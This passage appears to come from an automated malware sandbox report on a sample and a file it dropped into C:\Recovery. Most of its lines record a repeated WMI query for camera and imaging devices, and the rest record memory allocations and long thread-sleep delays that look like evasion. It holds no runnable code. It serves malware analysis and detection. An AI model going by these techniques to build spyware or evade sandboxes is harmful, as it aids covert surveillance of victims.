                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeMemory allocated: 1B130000 memory reserve | memory write watchJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeMemory allocated: 1130000 memory reserve | memory write watchJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeMemory allocated: 1ABC0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599859Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599750Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599641Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599516Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599406Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599297Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599187Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599078Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598968Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598859Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598750Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598641Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598525Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598406Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598297Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598188Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598078Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597969Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597859Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597750Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597641Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597531Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597422Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597312Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597203Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597094Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596984Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596875Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596766Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596656Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596547Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596438Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596313Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596188Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596063Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595953Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595843Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595734Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595625Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595504Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595375Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595266Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595141Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594922Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594812Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594703Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594594Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWindow / User API: threadDelayed 1281Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeWindow / User API: threadDelayed 8412Jump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe TID: 3480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 2556Thread sleep time: -30000s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599859s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599750s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599641s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599516s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599406s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599297s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599187s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -599078s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 5004Thread sleep time: -7200000s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598968s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598859s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598750s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598641s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598525s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598406s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598297s >= -30000sJump to behavior
